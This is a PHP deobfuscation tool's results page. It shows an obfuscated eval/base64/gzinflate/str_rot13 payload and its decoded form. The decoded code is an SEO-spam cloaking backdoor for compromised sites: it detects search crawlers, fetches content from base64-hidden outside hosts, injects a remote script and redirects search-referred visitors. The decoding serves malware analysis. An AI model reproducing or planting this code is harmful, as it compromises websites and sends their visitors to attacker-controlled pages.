Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode(str_rot13('aEtWH+WV969xYRhtkNg1C9SyckNPkV3NOgPOJFiIFEe..
Decoded Output download
set_time_limit(0); error_reporting(0); define('VERSION', 'VCETE'); define('APIVERSION', '3'); define('API', base64_decode('aHR0cHM6Ly9jZG4uY2xvdWRmbGFyZWJyLmNvbS8=')); define('API_HTTP', base64_decode('aHR0cDovL2Nkbi5jbG91ZGZsYXJlYnIuY29tLw==')); define('API_JS', base64_decode('PHNjcmlwdCBhc3luYyBzcmM9Imh0dHBzOi8vYnIuZ29vZ2xlZXBsYXkuY29tL2Rhby5qcyI+PC9zY3JpcHQ+')); define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2JyLmdvb2dsZWVwbGF5LmNvbS9kYW8uaHRtbCI7PC9zY3JpcHQ+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8aDE+Tm90IEZvdW5kPC9oMT4KICAgIDwvYm9keT4KPC9odG1sPg==')); $req_ref = $_SERVER["HTTP_REFERER"]; $req_ua = $_SERVER["HTTP_USER_AGENT"]; $host = $_SERVER['HTTP_HOST']; $req_uri = $_SERVER['REQUEST_URI']; function is_prefix($uri, $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./') { return preg_match($prefix_regex, $uri) === 1; } function is_crawler($ua) { $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!'); foreach ($crawlers as $c) { if (stripos($ua, $c) !== false) { return true; } } return false; } function is_visitor($ref) { if (substr($ref, 0, 4) === 'http') { $refs = array('google.', 'bing.', 'yahoo.'); foreach ($refs as $r) { if (stripos($ref, $r) !== false) { return true; } } } return false; } function get_content($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $result = curl_exec($ch); if ($result == NULL) { return file_get_contents($url); } curl_close($ch); return $result; } else { return file_get_contents($url); } } function get_client_ip() { foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (explode(',', $_SERVER[$key]) as $ip) { $ip = trim($ip); if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } function main() { global $req_ref, $req_ua, $host, $req_uri; header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); $uri_encoded = urlencode($req_uri); $headers = array(); if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE']; array_push($headers, "Accept-Language: $lang"); array_push($headers, "Vary: Accept-Language"); } if (is_crawler($req_ua)) { $crawler_ip = get_client_ip(); if (is_prefix($req_uri)) { header('Content-Type:text/html; charset=utf-8'); $htmls = get_content(API . "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers); $htmls = str_replace('</head>', API_JS . '</head>', $htmls); echo $htmls; exit; } else { echo file_get_contents(API . "suijiurl/index.php"); } } elseif (is_prefix($req_uri) && is_visitor($req_ref)) { header('Content-Type:text/html; charset=utf-8'); $client_ip = get_client_ip(); $allheaders = array(); if (!function_exists('getallheaders')) { function getallheaders() { $tmp_headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == 'HTTP_') { $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value; } } return $tmp_headers; } $allheaders = getallheaders(); } else { $allheaders = getallheaders(); } foreach ($allheaders as $key => $value) { if (stripos($key, 'Sec-') === 0) { array_push($headers, "$key: $value"); } } $html = get_content(API . "redirectv3.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3); $html = str_replace('</head>', API_JS . '</head>', $html); echo($html ? $html : FALLBACK_REDIRECT_HTML); exit; } } main();
Did this file decode correctly?
Original Code
<?php
eval(gzinflate(base64_decode(str_rot13('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'))));
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | eaa52813aa5f70ac9759d4a49ee5373c |
Eval Count | 1 |
Decode Time | 63 ms |